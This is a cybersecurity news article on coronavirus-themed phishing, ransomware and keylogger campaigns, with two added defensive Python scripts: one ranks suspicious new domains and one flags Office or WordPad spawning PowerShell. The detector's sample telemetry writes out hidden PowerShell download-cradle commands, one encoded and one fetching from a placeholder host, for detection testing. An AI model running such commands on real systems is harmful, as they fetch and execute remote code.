“There's a special ring of hell reserved for those who take advantage of a public health crisis to make money,” says Adam Levin, founder and chairman of CyberScout, a Scottsdale, AZ-based supplier of identity and data theft recovery services. I agree wholeheartedly with Levin on this, as I imagine most folks would.
“While this kind of fraud is the new normal, often fine-tuned for specific holidays and big news stories, a global health disaster creates an even more fertile field than usual for fraudsters,” Levin observes. “There is no population or demographic that isn't paying attention. As a result, the potential for impulse clicking is higher than usual.”
A much bigger problem is this: with so much going on, most people have not yet realized that any escalation in coronavirus-themed attacks will only add confusion to an already chaotic situation, and thus exacerbate delays in the response.
What people will eventually come to realize, the sooner the better, is that cybercrime is the wild card in this crisis and we will need to flatten its curve as well. Individual citizens, as well as companies, need to start practicing digital distancing as much as physical distancing. Here's what everyone should realize about the responsibility to practice rigorous cyber hygiene, now more than ever:
Attacks in the wild
Social engineering is almost always the first step in cyber attacks ranging from phishing and ransomware to business email compromise (BEC) scams and advanced persistent threat (APT) intrusions. Going forward, consumers and companies should expect the trajectory of coronavirus-themed cyber attacks to track the trajectory of the disease itself. It's already happening.
Firewall supplier Check Point Software Technologies has reported a massive surge in the registration of coronavirus-related domains since Jan. 2. Some of this is to be expected as legitimate response and recovery efforts ramp up, but Check Point analysts found these new domains to be 50% more likely to be malicious than other domains registered over the same period, with a meaningful share already confirmed malicious or suspicious.
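The practical response to a registration surge like the one Check Point describes is to watch your own feed of newly registered domains for the theme and rank them for review. The script below is an added example written for this article, not Check Point's tooling: it undoes the digit-for-letter substitutions registrants use to dodge naive matching, scores each name by theme and lure words, and ranks a constructed batch. The word lists and the sample domains are assumptions for illustration, and treating everything before the last dot as the name is a simplification that a public-suffix list would refine.

```python
import re

# Lexemes that marked the coronavirus-themed registration wave and lure words that
# typically accompany scam or phishing pages. Both lists are constructed for this
# example and would be tuned from a real feed of newly registered domains.
THEME_WORDS = ("coronavirus", "corona", "covid", "ncov", "sarscov", "pandemic")
LURE_WORDS = ("cure", "vaccine", "test", "mask", "relief", "map", "tracker",
              "donate", "stimulus", "alert", "update", "login")

# Digit-for-letter substitutions registrants use to dodge naive keyword matching.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t"})


def normalize(domain):
    """Reduce a domain to its non-TLD labels: lowercase, undo leetspeak, drop separators.

    Simplification (an assumption): everything before the last dot is treated as the
    name; a public-suffix list would handle multi-part TLDs such as .co.uk properly."""
    parts = domain.strip().lower().split(".")
    name = "".join(parts[:-1]) if len(parts) > 1 else parts[0]
    return name.translate(LEET).replace("-", "").replace("_", "")


def score_domain(domain):
    """Return (score, reasons). 0 = not coronavirus-themed; 1 = themed, monitor;
    2 or more = themed plus lure words, queue for analyst review."""
    name = normalize(domain)
    themes = [w for w in THEME_WORDS if w in name]
    if not themes:
        return 0, []
    lures = [w for w in LURE_WORDS if w in name]
    reasons = ["theme:" + themes[0]] + ["lure:" + w for w in lures]
    return 1 + len(lures), reasons


def triage(domains):
    """Rank a batch of newly registered domains, highest score first, dropping non-themed ones."""
    scored = [(d, *score_domain(d)) for d in domains]
    return sorted((s for s in scored if s[1] > 0), key=lambda s: -s[1])


# Constructed sample batch, not real registrations.
SAMPLE_DOMAINS = [
    "c0ronavirus-cure.com",
    "covid19-map.net",
    "example.org",
    "corona-beer-fans.com",
    "www.cov1d-test-kit-alert.info",
]

if __name__ == "__main__":
    for domain, score, reasons in triage(SAMPLE_DOMAINS):
        print(f"{score}  {domain:35s} {', '.join(reasons)}")
```

A score of 1 is deliberately only "monitor": a name like corona-beer-fans.com matches the theme and is almost certainly benign, which is exactly why the theme alone should feed a watch list rather than a block list.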
What form is this cyber badness taking? Researchers at Seattle-based DomainTools found one domain enticing Android smartphone users to download an app displaying a spiffy coronavirus heat map with key stats about the unfolding pandemic.
Unseen, the app also carries CovidLock, screen-locking ransomware that changes the device's lock-screen password, locks the user out and demands $100 in Bitcoin within 48 hours to restore access. It further threatens to erase the phone's storage, including contacts, pictures and videos, and to post that sensitive personal information publicly on the victim's social media accounts. DomainTools noted that phones running Android Nougat or later resist this trick, but only if the user had already set a lock-screen password.
Businesses are being heavily targeted as well. Researchers at Votiro, which helps companies defend against weaponized email attachments, have been intercepting variants of the notorious HawkEye keystroke-logging malware hidden inside RTF documents.
The RTF files arrive as seemingly benign email attachments under a clumsily spelled subject line: "coronavirus cure." Opening the file triggers embedded code that quietly invokes Windows PowerShell to install the malware. Like earlier versions, this HawkEye variant captures keystrokes and screenshots, with a focus on stealing account credentials.
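The chain Votiro describes, a document handler spawning PowerShell with downloader-style arguments, is one of the most dependable signals a defender can hunt for in process-creation telemetry. The detector below is an added example written for this article, not Votiro's product or anything from the HawkEye analysis: it parses constructed telemetry lines, flags document handlers (WordPad as well as Word, since WordPad is the default RTF viewer without Office) launching a shell, scores the usual downloader traits, and decodes a -EncodedCommand payload to look inside it. The log format, the parent and shell lists, and every sample line are assumptions for illustration.

```python
import base64
import ntpath
import re

# Document handlers that should never need to spawn a shell, and the shells/script
# hosts a document-borne dropper typically reaches for. Both sets are an assumption
# and would be extended for the environment being monitored.
DOC_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "wordpad.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits of a downloader stage; each one found adds to the score.
SUSPICIOUS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded command": re.compile(r"-e(?:ncodedcommand|nc)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "download cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I),
}


def decode_encoded(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; return it, or None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_line(line):
    """Parse one constructed telemetry line: time|parent_image|image|command_line."""
    parts = line.split("|", 3)
    if len(parts) != 4:
        return None
    time, parent, image, cmd = parts
    return {"time": time, "parent": parent, "image": image, "cmd": cmd}


def assess(event):
    """Score a process-creation event; 0 means it does not match the pattern at all."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    if parent not in DOC_PARENTS or image not in SHELLS:
        return 0, []
    score, reasons = 3, [f"{parent} spawned {image}"]
    for name, rx in SUSPICIOUS.items():
        m = rx.search(event["cmd"])
        if not m:
            continue
        score += 1
        reasons.append(name)
        if name == "encoded command":
            decoded = decode_encoded(m.group(1))
            if decoded is not None:
                reasons.append("decoded: " + decoded)
                if SUSPICIOUS["download cradle"].search(decoded):
                    score += 1
                    reasons.append("download cradle (in decoded payload)")
    return score, reasons


def scan(telemetry):
    """Run assess() over every line and return the events that scored, in order."""
    alerts = []
    for line in telemetry.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        score, reasons = assess(event)
        if score:
            alerts.append({"time": event["time"], "score": score, "reasons": reasons})
    return alerts


# Constructed sample telemetry (not real logs). The base64 in the first line is the
# UTF-16LE encoding of "IEX (New-Object", the opening of a typical download cradle.
SAMPLE_TELEMETRY = r"""2020-03-12T10:04:31Z|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2020-03-12T10:05:02Z|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\alice\notes.txt
2020-03-12T10:06:15Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-Process
2020-03-12T10:07:40Z|C:\Windows\System32\wordpad.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_TELEMETRY):
        print(alert["time"], alert["score"], "; ".join(alert["reasons"]))
```

The parent check is what keeps this quiet: an administrator running PowerShell from cmd.exe scores nothing, while WordPad or Word launching it scores even with a plain command line, and the decoded -Enc payload lifts the first sample line to the top of the queue.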
“Fear of the coronavirus pandemic has not stopped the work of cybercriminals,” Aviv Grafi, Votiro’s founder and CEO, told me. “Instead it’s given them more ammunition to wreak havoc . . . and their rate of penetration has been boosted by the explosion of organizational communications around COVID-19.”
Targeting key sectors
The healthcare sector and local governments carry a huge burden and must communicate extensively to get us clear of COVID-19. What we know is that municipalities and hospitals have been prime targets of ransomware purveyors over the past two years.
Assuming the top criminal hacking groups behave as you'd expect, building on established attack vectors to pursue maximum illicit profit above all else, we're in for waves of coronavirus-themed cyber attacks targeting these two critical sectors.
Threat management vendor RiskIQ, for one, warns that cybercriminals are likely to exploit global anxiety to prey on large corporations left in precarious positions because their supply chains run through coronavirus hotspots.
RiskIQ analyst Aaron Inness predicts we'll soon see a rise in "layered attack campaigns" that commence with phishing and social engineering ruses and escalate to deeper network intrusions, for disruption, criminal profit or both. The extortion-motivated disruption of the Champaign-Urbana Public Health District's website, taken down by NetWalker ransomware, is an early example.
Leaders of the top hacking collectives are astute and disciplined. They understand the opportunity presented by executives, managers and subordinates who are under heavy pressure to follow the latest developments, respond to email and click through to websites quickly. They know full well it only takes one overworked, well-intentioned health worker or county official, working remotely, to click on a weaponized email attachment or URL.
A call to cyber hygiene
It's imperative for each one of us to adopt the mindset of becoming less of an easy target for cyber criminals. For all individual computing device users, think twice before you open an email attachment, click a link or download a new mobile app. Do you really need to do it? Can you otherwise verify that what you're about to click on is safe?
“If you want the latest news or views on the virus, go to trusted sources which you should bookmark for additional protection,” advises Levin. “Make sure you do everything possible to secure your mobile devices and that both the firmware and software are routinely updated. Backup your data frequently on hard drives that aren't connected 24/7 to the internet. Always remember. Never trust. Always question. Always verify.”
Employers now dealing with a spike in employees working from home need to adjust their thinking to account not just for convenience and efficiency, but especially for cybersecurity.
It's time to review and reinforce remote access security policies, especially in the areas of authentication and privileged access. Equally important is a review and reinforcement of security policies for the use of cloud-based services, including productivity suites, collaboration tools, storage, infrastructure and platforms.
Just as companies tighten network access and security policies for employees, they must do the same for third-party contractors: everyone from DevOps software developers to the heating and ventilation vendor.
Cyber hygiene is no longer a best practice to aspire to, it’s a key component to getting us past the unfolding global pandemic. I’ll keep watch.